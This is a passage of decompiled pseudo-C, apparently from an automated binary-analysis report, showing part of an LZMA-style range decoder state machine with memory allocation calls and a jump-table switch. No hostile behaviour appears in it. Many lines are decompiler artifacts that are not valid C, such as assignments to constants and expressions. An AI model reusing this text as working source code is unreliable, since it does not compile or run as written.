						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
